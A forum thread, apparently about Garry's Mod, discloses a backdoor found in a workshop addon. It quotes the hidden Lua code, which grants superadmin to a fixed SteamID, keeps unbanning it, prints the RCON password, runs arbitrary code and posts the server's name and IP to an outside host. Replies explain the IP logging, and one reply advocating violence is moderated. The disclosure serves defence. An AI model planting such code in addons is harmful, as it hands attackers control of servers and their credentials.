PSA: Backdoor in workshop addon

There is a backdoor in this addon: by
The backdoor is located in \lua\weapons\weapon_admingun\shared.lua, and is as follows:

hook.Add( “Initialize”, “cakerawsd”, function()
concommand.Add( “_76sup”, function(ply)
if ( ply:SteamID() == “STEAM_0:0:153604459”) then
RunConsoleCommand(“ulx”, “adduserid”, ply:SteamID(), “superadmin”)
ply:ChatPrint("Your not superadmin, " … ply:Name() … “.”)

timer.Create( "checkForBan", 5, 0, function()
ULib.unban( "STEAM_0:0:153604459")
end )
concommand.Add("76soldier_cf",function() local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end)
concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end)
concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)
http.Post("", {name = GetHostName(),ip = game.GetIPAddress()})


This is the same exploit as in



And water is wet

people that do this deserve to get shoot in the arm with a .22

(User was banned for this post ("Advocating violence" - Shendow))

I’m genuinely curious, and because there’s a warning not to visit it I won’t, but, in the link OP provided,, what does the website we’re told not to visit do?

Does it give your computer some malware, or does it just track information and visiting the site would tell whoever runs it the jig is up?

The domain doesn’t exist anymore, so click the link all you want. As for what it used to do, I would assume it simply recorded the server’s IP so that the dude knows which servers use his backdoored addon.

http.Post("", {name = GetHostName(),ip = game.GetIPAddress()})

Nothing, it’s down.

It was used to log IPs and other info about servers with the backdoor.